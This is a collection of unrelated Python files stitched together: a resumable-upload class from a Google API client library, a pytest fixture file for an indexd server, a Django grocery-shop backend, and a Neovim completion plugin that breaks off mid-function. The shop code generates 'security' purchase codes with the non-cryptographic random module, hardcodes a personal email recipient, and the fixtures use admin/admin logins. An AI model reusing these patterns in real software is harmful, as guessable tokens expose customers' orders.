self.__total_size = None
self.progress_callback = progress_callback
self.finish_callback = finish_callback
self.total_size = total_size
@property
def progress(self):
return self.__progress
@classmethod
def FromFile(cls, filename, mime_type=None, auto_transfer=True, **kwds):
"""Create a new Upload object from a filename."""
path = os.path.expanduser(filename)
if not os.path.exists(path):
raise exceptions.NotFoundError('Could not find file %s' % path)
if not mime_type:
mime_type, _ = mimetypes.guess_type(path)
if mime_type is None:
raise exceptions.InvalidUserInputError(
'Could not guess mime type for %s' % path)
size = os.stat(path).st_size
return cls(open(path, 'rb'), mime_type, total_size=size,
close_stream=True, auto_transfer=auto_transfer, **kwds)
@classmethod
def FromStream(cls, stream, mime_type, total_size=None, auto_transfer=True,
**kwds):
"""Create a new Upload object from a stream."""
if mime_type is None:
raise exceptions.InvalidUserInputError(
'No mime_type specified for stream')
return cls(stream, mime_type, total_size=total_size,
close_stream=False, auto_transfer=auto_transfer, **kwds)
@classmethod
def FromData(cls, stream, json_data, http, auto_transfer=None, **kwds):
"""Create a new Upload of stream from serialized json_data and http."""
info = json.loads(json_data)
missing_keys = cls._REQUIRED_SERIALIZATION_KEYS - set(info.keys())
if missing_keys:
raise exceptions.InvalidDataError(
'Invalid serialization data, missing keys: %s' % (
', '.join(missing_keys)))
if 'total_size' in kwds:
raise exceptions.InvalidUserInputError(
'Cannot override total_size on serialized Upload')
upload = cls.FromStream(stream, info['mime_type'],
total_size=info.get('total_size'), **kwds)
if isinstance(stream, io.IOBase) and not stream.seekable():
raise exceptions.InvalidUserInputError(
'Cannot restart resumable upload on non-seekable stream')
if auto_transfer is not None:
upload.auto_transfer = auto_transfer
else:
upload.auto_transfer = info['auto_transfer']
upload.strategy = RESUMABLE_UPLOAD
upload._Initialize( # pylint: disable=protected-access
http, info['url'])
upload.RefreshResumableUploadState()
upload.EnsureInitialized()
if upload.auto_transfer:
upload.StreamInChunks()
return upload
@property
def serialization_data(self):
self.EnsureInitialized()
if self.strategy != RESUMABLE_UPLOAD:
raise exceptions.InvalidDataError(
'Serialization only supported for resumable uploads')
return {
'auto_transfer': self.auto_transfer,
'mime_type': self.mime_type,
'total_size': self.total_size,
'url': self.url,
}
@property
def complete(self):
return self.__complete
@property
def mime_type(self):
return self.__mime_type
def __str__(self):
if not self.initialized:
return 'Upload (uninitialized)'
else:
return 'Upload with %d/%s bytes transferred for url %s' % (
self.progress, self.total_size or '???', self.url)
@property
def strategy(self):
return self.__strategy
@strategy.setter
def strategy(self, value):
if value not in (SIMPLE_UPLOAD, RESUMABLE_UPLOAD):
raise exceptions.UserError((
'Invalid value "%s" for upload strategy, must be one of '
'"simple" or "resumable".') % value)
self.__strategy = value
@property
def total_size(self):
return self.__total_size
@total_size.setter
def total_size(self, value):
self.EnsureUninitialized()
self.__total_size = value
def __SetDefaultUploadStrategy(self, upload_config, http_request):
"""Determine and set the default upload strategy for this upload.
We generally prefer simple or multipart, unless we're forced to
use resumable. This happens when any of (1) the upload is too
large, (2) the simple endpoint doesn't support multipart requests
and we have metadata, or (3) there is no simple upload endpoint.
Args:
upload_config: Configuration for the upload endpoint.
http_request: The associated http request.
Returns:
None.
"""
if upload_config.resumable_path is None:
self.strategy = SIMPLE_UPLOAD
if self.strategy is not None:
return
strategy = SIMPLE_UPLOAD
if (self.total_size is not None and
self.total_size > _RESUMABLE_UPLOAD_THRESHOLD):
strategy = RESUMABLE_UPLOAD
if http_request.body and not upload_config.simple_multipart:
strategy = RESUMABLE_UPLOAD
if not upload_config.simple_path:
strategy = RESUMABLE_UPLOAD
self.strategy = strategy
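# Illustrative note (added): assuming the endpoint offers both simple and resumable
# paths, a 4 MiB upload with no metadata body keeps SIMPLE_UPLOAD, while an upload
# larger than the 5 MiB _RESUMABLE_UPLOAD_THRESHOLD, a request with a metadata body
# when multipart is unsupported, or a missing simple path all force RESUMABLE_UPLOAD.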
def ConfigureRequest(self, upload_config, http_request, url_builder):
"""Configure the request and url for this upload."""
# Validate total_size vs. max_size
if (self.total_size and upload_config.max_size and
self.total_size > upload_config.max_size):
raise exceptions.InvalidUserInputError(
'Upload too big: %s larger than max size %s' % (
self.total_size, upload_config.max_size))
# Validate mime type
if not util.AcceptableMimeType(upload_config.accept, self.mime_type):
raise exceptions.InvalidUserInputError(
'MIME type %s does not match any accepted MIME ranges %s' % (
self.mime_type, upload_config.accept))
self.__SetDefaultUploadStrategy(upload_config, http_request)
if self.strategy == SIMPLE_UPLOAD:
url_builder.relative_path = upload_config.simple_path
if http_request.body:
url_builder.query_params['uploadType'] = 'multipart'
self.__ConfigureMultipartRequest(http_request)
else:
url_builder.query_params['uploadType'] = 'media'
self.__ConfigureMediaRequest(http_request)
else:
url_builder.relative_path = upload_config.resumable_path
url_builder.query_params['uploadType'] = 'resumable'
self.__ConfigureResumableRequest(http_request)
def __ConfigureMediaRequest(self, http_request):
"""Configure http_request as a simple request for this upload."""
http_request.headers['content-type'] = self.mime_type
http_request.body = self.stream.read()
http_request.loggable_body = '<media body>'
def __ConfigureMultipartRequest(self, http_request):
"""Configure http_request as a multipart request for this upload."""
# This is a multipart/related upload.
msg_root = mime_multipart.MIMEMultipart('related')
# msg_root should not write out its own headers
setattr(msg_root, '_write_headers', lambda self: None)
# attach the body as one part
msg = mime_nonmultipart.MIMENonMultipart(
*http_request.headers['content-type'].split('/'))
msg.set_payload(http_request.body)
msg_root.attach(msg)
# attach the media as the second part
msg = mime_nonmultipart.MIMENonMultipart(*self.mime_type.split('/'))
msg['Content-Transfer-Encoding'] = 'binary'
msg.set_payload(self.stream.read())
msg_root.attach(msg)
# NOTE: We encode the body, but can't use
# `email.message.Message.as_string` because it prepends
# `> ` to `From ` lines.
fp = six.BytesIO()
if six.PY3:
generator_class = email_generator.BytesGenerator
else:
generator_class = email_generator.Generator
g = generator_class(fp, mangle_from_=False)
g.flatten(msg_root, unixfrom=False)
http_request.body = fp.getvalue()
multipart_boundary = msg_root.get_boundary()
http_request.headers['content-type'] = (
'multipart/related; boundary=%r' % multipart_boundary)
if isinstance(multipart_boundary, six.text_type):
multipart_boundary = multipart_boundary.encode('ascii')
body_components = http_request.body.split(multipart_boundary)
headers, _, _ = body_components[-2].partition(b'\n\n')
body_components[-2] = b'\n\n'.join([headers, b'<media body>\n\n--'])
http_request.loggable_body = multipart_boundary.join(body_components)
def __ConfigureResumableRequest(self, http_request):
http_request.headers['X-Upload-Content-Type'] = self.mime_type
if self.total_size is not None:
http_request.headers[
'X-Upload-Content-Length'] = str(self.total_size)
def RefreshResumableUploadState(self):
"""Talk to the server and refresh the state of this resumable upload.
Returns:
Response if the upload is complete.
"""
if self.strategy != RESUMABLE_UPLOAD:
return
self.EnsureInitialized()
refresh_request = http_wrapper.Request(
url=self.url, http_method='PUT',
headers={'Content-Range': 'bytes */*'})
refresh_response = http_wrapper.MakeRequest(
self.http, refresh_request, redirections=0,
retries=self.num_retries)
range_header = self._GetRangeHeaderFromResponse(refresh_response)
if refresh_response.status_code in (http_client.OK,
http_client.CREATED):
self.__complete = True
self.__progress = self.total_size
self.stream.seek(self.progress)
# If we're finished, the refresh response will contain the metadata
# originally requested. Cache it so it can be returned in
# StreamInChunks.
self.__final_response = refresh_response
elif refresh_response.status_code == http_wrapper.RESUME_INCOMPLETE:
if range_header is None:
self.__progress = 0
else:
self.__progress = self.__GetLastByte(range_header) + 1
self.stream.seek(self.progress)
else:
raise exceptions.HttpError.FromResponse(refresh_response)
def _GetRangeHeaderFromResponse(self, response):
return response.info.get('Range', response.info.get('range'))
def InitializeUpload(self, http_request, http=None, client=None):
"""Initialize this upload from the given http_request."""
if self.strategy is None:
raise exceptions.UserError(
'No upload strategy set; did you call ConfigureRequest?')
if http is None and client is None:
raise exceptions.UserError('Must provide client or http.')
if self.strategy != RESUMABLE_UPLOAD:
return
http = http or client.http
if client is not None:
http_request.url = client.FinalizeTransferUrl(http_request.url)
self.EnsureUninitialized()
http_response = http_wrapper.MakeRequest(http, http_request,
retries=self.num_retries)
if http_response.status_code != http_client.OK:
raise exceptions.HttpError.FromResponse(http_response)
self.__server_chunk_granularity = http_response.info.get(
'X-Goog-Upload-Chunk-Granularity')
url = http_response.info['location']
if client is not None:
url = client.FinalizeTransferUrl(url)
self._Initialize(http, url)
# Unless the user has requested otherwise, we want to just
# go ahead and pump the bytes now.
if self.auto_transfer:
return self.StreamInChunks()
else:
return http_response
def __GetLastByte(self, range_header):
_, _, end = range_header.partition('-')
# TODO(craigcitro): Validate start == 0?
return int(end)
def __ValidateChunksize(self, chunksize=None):
if self.__server_chunk_granularity is None:
return
chunksize = chunksize or self.chunksize
if chunksize % self.__server_chunk_granularity:
raise exceptions.ConfigurationValueError(
'Server requires chunksize to be a multiple of %d',
self.__server_chunk_granularity)
def __StreamMedia(self, callback=None, finish_callback=None,
additional_headers=None, use_chunks=True):
"""Helper function for StreamMedia / StreamInChunks."""
if self.strategy != RESUMABLE_UPLOAD:
raise exceptions.InvalidUserInputError(
'Cannot stream non-resumable upload')
callback = callback or self.progress_callback
finish_callback = finish_callback or self.finish_callback
# final_response is set if we resumed an already-completed upload.
response = self.__final_response
send_func = self.__SendChunk if use_chunks else self.__SendMediaBody
if use_chunks:
self.__ValidateChunksize(self.chunksize)
self.EnsureInitialized()
while not self.complete:
response = send_func(self.stream.tell(),
additional_headers=additional_headers)
if response.status_code in (http_client.OK, http_client.CREATED):
self.__complete = True
break
self.__progress = self.__GetLastByte(response.info['range'])
if self.progress + 1 != self.stream.tell():
# TODO(craigcitro): Add a better way to recover here.
raise exceptions.CommunicationError(
'Failed to transfer all bytes in chunk, upload paused at '
'byte %d' % self.progress)
self._ExecuteCallback(callback, response)
if self.__complete and hasattr(self.stream, 'seek'):
current_pos = self.stream.tell()
self.stream.seek(0, os.SEEK_END)
end_pos = self.stream.tell()
self.stream.seek(current_pos)
if current_pos != end_pos:
raise exceptions.TransferInvalidError(
'Upload complete with %s additional bytes left in stream' %
(int(end_pos) - int(current_pos)))
self._ExecuteCallback(finish_callback, response)
return response
def StreamMedia(self, callback=None, finish_callback=None,
additional_headers=None):
"""Send this resumable upload in a single request.
Args:
callback: Progress callback function with inputs
(http_wrapper.Response, transfer.Upload)
finish_callback: Final callback function with inputs
(http_wrapper.Response, transfer.Upload)
additional_headers: Dict of headers to include with the upload
http_wrapper.Request.
Returns:
http_wrapper.Response of final response.
"""
return self.__StreamMedia(
callback=callback, finish_callback=finish_callback,
additional_headers=additional_headers, use_chunks=False)
def StreamInChunks(self, callback=None, finish_callback=None,
additional_headers=None):
"""Send this (resumable) upload in chunks."""
return self.__StreamMedia(
callback=callback, finish_callback=finish_callback,
additional_headers=additional_headers)
def __SendMediaRequest(self, request, end):
"""Request helper function for SendMediaBody & SendChunk."""
response = http_wrapper.MakeRequest(
self.bytes_http, request, retry_func=self.retry_func,
retries=self.num_retries)
if response.status_code not in (http_client.OK, http_client.CREATED,
http_wrapper.RESUME_INCOMPLETE):
# We want to reset our state to wherever the server left us
# before this failed request, and then raise.
self.RefreshResumableUploadState()
raise exceptions.HttpError.FromResponse(response)
if response.status_code == http_wrapper.RESUME_INCOMPLETE:
last_byte = self.__GetLastByte(
self._GetRangeHeaderFromResponse(response))
if last_byte + 1 != end:
self.stream.seek(last_byte)
return response
def __SendMediaBody(self, start, additional_headers=None):
"""Send the entire media stream in a single request."""
self.EnsureInitialized()
if self.total_size is None:
raise exceptions.TransferInvalidError(
'Total size must be known for SendMediaBody')
body_stream = stream_slice.StreamSlice(
self.stream, self.total_size - start)
request = http_wrapper.Request(url=self.url, http_method='PUT',
body=body_stream)
request.headers['Content-Type'] = self.mime_type
if start == self.total_size:
# End of an upload with 0 bytes left to send; just finalize.
range_string = 'bytes */%s' % self.total_size
else:
range_string = 'bytes %s-%s/%s' % (start, self.total_size - 1,
self.total_size)
request.headers['Content-Range'] = range_string
if additional_headers:
request.headers.update(additional_headers)
return self.__SendMediaRequest(request, self.total_size)
def __SendChunk(self, start, additional_headers=None):
"""Send the specified chunk."""
self.EnsureInitialized()
no_log_body = self.total_size is None
if self.total_size is None:
# For the streaming resumable case, we need to detect when
# we're at the end of the stream.
body_stream = buffered_stream.BufferedStream(
self.stream, start, self.chunksize)
end = body_stream.stream_end_position
if body_stream.stream_exhausted:
self.__total_size = end
# TODO: Here, change body_stream from a stream to a string object,
# which means reading a chunk into memory. This works around
# https://code.google.com/p/httplib2/issues/detail?id=176 which can
# cause httplib2 to skip bytes on 401's for file objects.
# Rework this solution to be more general.
# pylint: disable=redefined-variable-type
body_stream = body_stream.read(self.chunksize)
else:
end = min(start + self.chunksize, self.total_size)
body_stream = stream_slice.StreamSlice(self.stream, end - start)
# TODO(craigcitro): Think about clearer errors on "no data in
# stream".
request = http_wrapper.Request(url=self.url, http_method='PUT',
body=body_stream)
request.headers['Content-Type'] = self.mime_type
if no_log_body:
# Disable logging of streaming body.
# TODO: Remove no_log_body and rework as part of a larger logs
# refactor.
request.loggable_body = '<media body>'
if self.total_size is None:
# Streaming resumable upload case, unknown total size.
range_string = 'bytes %s-%s/*' % (start, end - 1)
elif end == start:
# End of an upload with 0 bytes left to send; just finalize.
range_string = 'bytes */%s' % self.total_size
else:
# Normal resumable upload case with known sizes.
range_string = 'bytes %s-%s/%s' % (start, end - 1, self.total_size)
request.headers['Content-Range'] = range_string
if additional_headers:
request.headers.update(additional_headers)
return self.__SendMediaRequest(request, end)
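# Illustrative usage sketch (added; not part of the original module). It assumes an
# apitools-generated client whose service methods accept download=/upload= objects;
# "client", "request", and the paths below are placeholders.
#
#   download = Download.FromFile('/tmp/object.bin', overwrite=True)
#   client.objects.Get(request, download=download)    # bytes stream into the file
#
#   upload = Upload.FromFile('/tmp/object.bin', mime_type='application/octet-stream')
#   client.objects.Insert(request, upload=upload)     # auto_transfer sends in chunks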
|
conftest.py
|
from multiprocessing import Process
import pytest
from .indexd_fixture import (
IndexClient,
MockServer,
create_user,
remove_sqlite_files,
run_indexd,
clear_database,
setup_database,
wait_for_indexd_alive,
wait_for_indexd_not_alive,
)
# Note the leading "." in the indexd_fixture import above (a relative import).
# For more information:
# https://stackoverflow.com/questions/16981921/relative-imports-in-python-3#16985066
# Basically the options are:
# 1) Use setuptools for this repo
# 2) Some terrible looking relative imports
@pytest.fixture(scope="session")
def indexd_server():
"""
Starts the indexd server, and cleans up its mess.
Most tests will use the client which stems from this
server fixture.
Runs once per test session.
"""
port = 8001
indexd = Process(target=run_indexd, args=[port])
indexd.start()
wait_for_indexd_alive(port)
yield MockServer(port=port)
indexd.terminate()
wait_for_indexd_not_alive(port)
@pytest.fixture(scope="function")
def indexd_client(indexd_server):
"""
Returns an IndexClient. This will delete any documents,
aliases, or users made by this
client after the test has completed.
Currently the default user is the admin user
Runs once per test.
"""
setup_database()
client = IndexClient(
baseurl=indexd_server.baseurl, auth=create_user("admin", "admin")
)
yield client
clear_database()
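# Illustrative example (added; not part of the original conftest): a test that
# consumes the function-scoped fixture above. The create()/get() calls shown are
# assumed from the indexd client library, not defined in this file.
#
# def test_create_and_fetch_record(indexd_client):
#     record = indexd_client.create(hashes={"md5": "0" * 32}, size=1)
#     assert indexd_client.get(record.did) is not None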
|
backEnd.py
|
from django.contrib.auth.models import User
from maracay.models import Product, Profile, PurchaseConfirmation, Tools, purchaseHistory
from django.db import transaction
import json,random, string
from threading import Thread
from django.template.loader import render_to_string
from django.core.mail import send_mail
from django.conf import settings
from datetime import datetime, timedelta, date, time
import schedule, time, pytz, datetime
class backStart():
def __init__(self, request):
self._request = request
self.user = 0
self.response_data = {'error':[], 'data':[],'data2':[]}
self.code = 200
def get(self,params=None):
self.response_data['cantTotal']= Product.objects.all()
#self.response_data['first'] = self._request.GET.get('start',0)
#self.response_data['last'] = self._request.GET.get('end',12)
try:
for a in Product.objects.all():
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
'''for b in Product.objects.filter()[int(self._request.GET.get('start',0)):int(self._request.GET.get('end',12))]:
self.response_data['data2'].append({
"category":b.category,
"id":b.id,
"cant":b.cant,
"name":b.name,
"description":b.description,
"image":b.image,
#"price":b.price,
})'''
except Exception as e:
self.code = 500
return self.response_data['error'].append(str(e))
def guardaCompra(self):
def hilo2():
try:
print (self._request.POST)
######################## purchase security code ###################
def ran_gen(size, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
tokenCode = ran_gen(30,"abcdefghijkLmnNopqrstuvwxyz0123456789./*-")
########################################################################
carro = json.loads(self._request.POST['carrito'])
dataSave = {}
productId = 0
carroEmail = {'compra':[]}
for value in carro:
for k,v in value.items():
if k == 'id':
dataSave['product']=Product.objects.get(pk=int(v))
if k == 'cantidad':
dataSave['cant_product']=v
dataSave['start_date'] = self._request.POST['start_date']
dataSave['code'] = tokenCode
user = User.objects.get(email=self._request.user)
compras = PurchaseConfirmation.objects.create(
code=dataSave['code'],
user=user,
payment_type=self._request.POST['pago'],
confirmation=2,
product=dataSave['product'],
start_date=dataSave['start_date'],
cant_product=dataSave['cant_product'],
)
dataSave['product'].cant = dataSave['product'].cant - int(dataSave['cant_product'])
dataSave['product'].save()
compras.save()
dataSave = {}
productId = 0
#save purchase history################
historialCompras = purchaseHistory.objects.create(
code_purchase=tokenCode,
user=user,
total=''
)
historialCompras.save()
###############################
#Send the invoice by email
carroEmail = {'compra':[]}
allProducts = PurchaseConfirmation.objects.filter(code=compras.code)
totalGeneral=0
for value in allProducts:
carroEmail['compra'].append({
'image':value.product.image,
'name':value.product.name,
'price':str(value.product.price)+' / '+str(value.cant_product),
'total':float(value.product.price)*int(value.cant_product),
})
totalGeneral = totalGeneral+(float(value.product.price)*int(value.cant_product))
carroEmail['totalGeneral'] = totalGeneral
carroEmail['totalCompleto'] = carroEmail['totalGeneral']+Tools.objects.get(pk=1).costoenvio
msg_html = render_to_string('market/facturaCompra.html',
{
'asunto':'Factura' ,
'payment_type':self._request.POST['pago'],
'email':self._request.user,
'carro':carroEmail['compra'],
'totalGeneral':carroEmail['totalGeneral'],
'totalCompleto':carroEmail['totalCompleto'],
'codigo':tokenCode,
'costoEnvio':Tools.objects.get(pk=1).costoenvio,
})
send_mail(
'Title',
'Subject',
settings.EMAIL_HOST_USER,#from
['alfonsojn15@gmail.com'],#to
html_message=msg_html,
)
except Exception as e:
print (e)
self.code = 500
thread = Thread(target = hilo2)
thread.start()
def detailProducts(self):
print (self._request.user.id)
productos = PurchaseConfirmation.objects.filter(code=self._request.GET['code'])
totalGeneral=0
for value in productos:
totalGeneral = totalGeneral+(float(value.product.price)*int(value.cant_product))
self.response_data['data'].append({
'payment_type':value.payment_type,
'code':value.code,
'confirmation':value.confirmation,
'start_date':value.start_date,
'name':value.product.name,
'price':value.product.price,
'image':value.product.image,
'total':float(value.product.price)*int(value.cant_product),
'cant_product':value.cant_product,
})
totalCompleto = totalGeneral+Tools.objects.get(pk=1).costoenvio
self.response_data['data2'].append({
'totalGeneral':totalGeneral,
'totalCompleto':totalCompleto,
'direccion':Profile.objects.get(user=self._request.user.id).direction,
'costoenvio':Tools.objects.get(pk=1).costoenvio,
})
class profileBackend():
def __init__(self, request):
self._request = request
self.user = 0
self.response_data = {'error':[], 'data':[]}
self.code = 200
def post(self):
#User creation
inssertDict = {}
inssertDictProfile = {}
if 'email' in self._request.POST:
inssertDict['email'] = self._request.POST['email']
inssertDict['username'] = self._request.POST['email']
else:
return self.response_data['error'].append("Error al crear Usuario/Sin email")
if 'name' in self._request.POST:
inssertDict['first_name']=self._request.POST['name']
if 'lastname' in self._request.POST:
inssertDict['last_name']=self._request.POST['lastname']
if 'password' in self._request.POST:
inssertDict['password'] = self._request.POST['password']
else:
return self.response_data['error'].append("Error al crear Usuario/Sin contraseña")
if 'phone' in self._request.POST:
inssertDictProfile['phone'] = self._request.POST['phone']
else:
return self.response_data['error'].append("Debe insertar un número célular")
if 'direction' in self._request.POST:
inssertDictProfile['direction'] = self._request.POST['direction']
else:
return self.response_data['error'].append("Debe insertar una Dirección")
if 'rif' in self._request.POST:
inssertDictProfile['rif'] = self._request.POST['rif']
else:
inssertDictProfile['rif'] = ''
if 'localphone' in self._request.POST:
inssertDictProfile['localphone'] = self._request.POST['localphone']
else:
inssertDictProfile['localphone'] = ''
if 'reference' in self._request.POST:
inssertDictProfile['reference'] = self._request.POST['reference']
else:
inssertDictProfile['reference'] = ''
try:
with transaction.atomic():
try:
getVerifiedUser = User.objects.get(username=inssertDict['username'])
self.code = 500
return self.response_data['error'].append("Ya este Email existe")
except Exception as e:
user = User.objects.create_user(**inssertDict)
inssertDictProfile['user'] = user
creteProfile = Profile(**inssertDictProfile)
creteProfile.save()
except Exception as e:
print (e)
self.code = 500
return self.response_data['error'].append("Error al crear Usuario"+str(e))
def accountData(self):
dataA = purchaseHistory.objects.all()
for a in dataA:
tabladecompra = PurchaseConfirmation.objects.filter(code=a.code_purchase).last()
self.response_data['data'].append({
"code_purchase":a.code_purchase,
"total":a.total,
"state":tabladecompra.confirmation,
"payment_type":tabladecompra.payment_type,
"start_date":tabladecompra.start_date-timedelta(hours=4),
})
class filterProducts():
def __init__(self, request):
self._request = request
self.user = 0
self.response_data = {'error':[], 'data':[]}
self.code = 200
def allProductsFilter(self):
self.response_data['cantTotal']= Product.objects.all()
for a in Product.objects.all():
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
def viveresProductsFilter(self):
self.response_data['cantTotal']= Product.objects.filter(category=1)
for a in Product.objects.filter(category=1):
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
def frigorificoProductsFilter(self):
self.response_data['cantTotal']= Product.objects.filter(category=2)
for a in Product.objects.filter(category=2):
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
def enlatadosProductsFilter(self):
self.response_data['cantTotal']= Product.objects.filter(category=3)
for a in Product.objects.filter(category=3):
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
class adminSite():
def __init__(self, request):
self._request = request
self.user = 0
self.response_data = {'error':[], 'data':[]}
self.code = 200
def dataProductUser(self):
self.response_data['cantTotal']= Product.objects.all()
for a in Product.objects.all():
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
def viveresProductsFilterAdmin(self):
self.response_data['cantTotal']= Product.objects.filter(category=1)
for a in Product.objects.filter(category=1):
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
def frigorificoProductsFilterAdmin(self):
self.response_data['cantTotal']= Product.objects.filter(category=2)
for a in Product.objects.filter(category=2):
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
def enlatadosProductsFilterAdmin(self):
self.response_data['cantTotal']= Product.objects.filter(category=3)
for a in Product.objects.filter(category=3):
self.response_data['data'].append({
"category":a.category,
"id":a.id,
"name":a.name,
"cant":a.cant,
"description":a.description,
"name_image":a.name_image,
#"price":a.price,
})
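# Editor's sketch (not part of the original module): the category-filter
# methods above all repeat the same serialization loop. A hypothetical helper
# like this one could remove that duplication:
def serialize_products(queryset):
    """Return the list-of-dicts shape built repeatedly in the classes above."""
    return [
        {
            "category": a.category,
            "id": a.id,
            "name": a.name,
            "cant": a.cant,
            "description": a.description,
            "name_image": a.name_image,
        }
        for a in queryset
    ]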
|
__init__.py
|
import asyncio
import concurrent.futures
import difflib
import fnmatch
import functools
import glob
import importlib
from importlib.util import find_spec
import itertools
import multiprocessing
import os
from pathlib import Path
import pwd
import shutil
import threading
import time
if find_spec('pynvim'):
import pynvim as neovim
else:
import neovim
@neovim.plugin
class Wilder(object):
def __init__(self, nvim):
self.nvim = nvim
self.has_init = False
self.queue = multiprocessing.Queue()
self.events = []
self.lock = threading.Lock()
self.executor = None
self.cached_buffer = {'bufnr': -1, 'undotree_seq_cur': -1, 'buffer': []}
self.run_id = -1
def handle(self, ctx, x, command='resolve'):
self.nvim.call('wilder#' + command, ctx, x)
def echomsg(self, x):
self.nvim.session.threadsafe_call(lambda: self.nvim.command('echomsg "' + x + '"'))
def run_in_background(self, fn, args):
event = threading.Event()
ctx = args[0]
with self.lock:
if ctx['run_id'] < self.run_id:
return
self.run_id = ctx['run_id']
while len(self.events) > 0:
e = self.events.pop(0)
e.set()
self.events.append(event)
self.executor.submit(functools.partial(fn, *([event] + args)))
def consumer(self):
while True:
args = self.queue.get()
ctx = args[0]
res = args[1]
while not self.queue.empty():
new_args = self.queue.get_nowait()
new_ctx = new_args[0]
if (new_ctx['run_id'] > ctx['run_id'] or
(new_ctx['run_id'] == ctx['run_id'] and new_ctx['step'] > ctx['step'])):
args = new_args
ctx = args[0]
res = args[1]
if len(args) > 2:
command = args[2]
self.nvim.async_call(self.handle, ctx, res, command=command)
else:
self.nvim.async_call(self.handle, ctx, res)
@neovim.function('_wilder_init', sync=True)
def init(self, args):
if self.has_init:
return
self.has_init = True
opts = args[0]
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=opts['num_workers'])
t = threading.Thread(target=self.consumer, daemon=True)
t.start()
@neovim.function('_wilder_python_sleep', sync=False, allow_nested=True)
def sleep(self, args):
self.run_in_background(self.sleep_handler, args)
def sleep_handler(self, event, ctx, t, x):
if event.is_set():
return
time.sleep(t)
self.queue.put((ctx, x,))
@neovim.function('_wilder_python_search', sync=False)
def search(self, args):
if args[2] == "":
self.handle(args[1], [])
return
bufnr = self.nvim.current.buffer.number
undotree_seq_cur = self.nvim.eval('undotree().seq_cur')
if (bufnr != self.cached_buffer['bufnr'] or
undotree_seq_cur != self.cached_buffer['undotree_seq_cur']):
self.cached_buffer = {
'bufnr': bufnr,
'undotree_seq_cur': undotree_seq_cur,
'buffer': list(self.nvim.current.buffer),
}
self.run_in_background(self.search_handler, args + [self.cached_buffer['buffer']])
def search_handler(self, event, ctx, opts, x, buf):
if event.is_set():
return
try:
module_name = opts['engine'] if 'engine' in opts else 're'
max_candidates = opts['max_candidates'] if 'max_candidates' in opts else 300
seen = set()
candidates = []
re = importlib.import_module(module_name)
# re2 does not use re.UNICODE by default
pattern = re.compile(x, re.UNICODE)
for line in buf:
if event.is_set():
return
for match in pattern.finditer(line):
if event.is_set():
return
candidate = match.group()
if candidate not in seen:
seen.add(candidate)
candidates.append(candidate)
if max_candidates > 0 and len(candidates) >= max_candidates:
self.queue.put((ctx, candidates,))
return
self.queue.put((ctx, candidates,))
except Exception as e:
self.queue.put((ctx, 'python_search: ' + str(e), 'reject',))
finally:
with self.lock:
self.events.remove(event)
@neovim.function('_wilder_python_uniq', sync=False, allow_nested=True)
def uniq(self, args):
self.run_in_background(self.uniq_handler, args)
def uniq_handler(self, event, ctx, candidates):
if event.is_set():
return
seen = set()
try:
res = [x for x in candidates if not (x in seen or seen.add(x))]
self.queue.put((ctx, res,))
except Exception as e:
self.queue.put((ctx, 'python_uniq: ' + str(e), 'reject',))
@neovim.function('_wilder_python_sort', sync=False, allow_nested=True)
def sort(self, args):
self.run_in_background(self.sort_handler, args)
def sort_handler(self, event, ctx, candidates):
if event.is_set():
return
try:
res = sorted(candidates)
self.queue.put((ctx, res,))
except Exception as e:
self.queue.put((ctx, 'python_sort: ' + str(e), 'reject',))
@neovim.function('_wilder_python_get_file_completion', sync=False)
def get_file_completion(self, args):
if args[2] == 'file_in_path':
path_opt = self.nvim.eval('&path')
directories = path_opt.split(',')
directories += [self.nvim.eval('expand("%:h")')]
elif args[2] == 'shellcmd':
path = os.environ['PATH']
directories = path.split(':')
else:
directories = [self.nvim.eval('getcwd()')]
wildignore_opt = self.nvim.eval('&wildignore')
self.run_in_background(self.get_file_completion_handler, args + [wildignore_opt, directories])
def get_file_completion_handler(self,
event,
ctx,
expand_arg,
expand_type,
has_wildcard,
path_prefix,
wildignore_opt,
directories):
if event.is_set():
return
try:
res = []
wildignore_list = wildignore_opt.split(',')
for directory in directories:
if event.is_set():
return
if not directory:
continue
if has_wildcard:
tail = os.path.basename(expand_arg)
show_hidden = tail.startswith('.')
pattern = ''
wildcard = os.path.join(directory, expand_arg)
wildcard = os.path.expandvars(wildcard)
it = glob.iglob(wildcard, recursive=True)
else:
path = os.path.join(directory, expand_arg)
(head, tail) = os.path.split(path)
show_hidden = tail.startswith('.')
pattern = tail + '*'
try:
it = os.scandir(head)
except FileNotFoundError:
continue
for entry in it:
if event.is_set():
return
try:
if has_wildcard:
entry = Path(entry)
try:
entry = entry.relative_to(directory)
except ValueError:
pass
if entry.name.startswith('.') and not show_hidden:
continue
if expand_type == 'dir' and not entry.is_dir():
continue
ignore = False
for wildignore in wildignore_list:
if fnmatch.fnmatch(entry.name, wildignore):
ignore = True
break
if ignore:
continue
if not has_wildcard and pattern and not fnmatch.fnmatch(entry.name, pattern):
continue
if expand_type == 'shellcmd' and (
not entry.is_file() or not os.access(os.path.join(directory, entry.name), os.X_OK)):
continue
if has_wildcard and Path(entry) == Path(path_prefix):
continue
if entry.is_dir():
res.append((str(entry) if has_wildcard else entry.name) + os.sep)
else:
res.append(str(entry) if has_wildcard else entry.name)
except OSError:
pass
res = sorted(res)
head = os.path.dirname(expand_arg)
if not has_wildcard:
res = list(map(lambda f: os.path.join(head, f) if head else f, res))
if expand_arg == '.':
res.insert(0, '../')
res.insert(0, './')
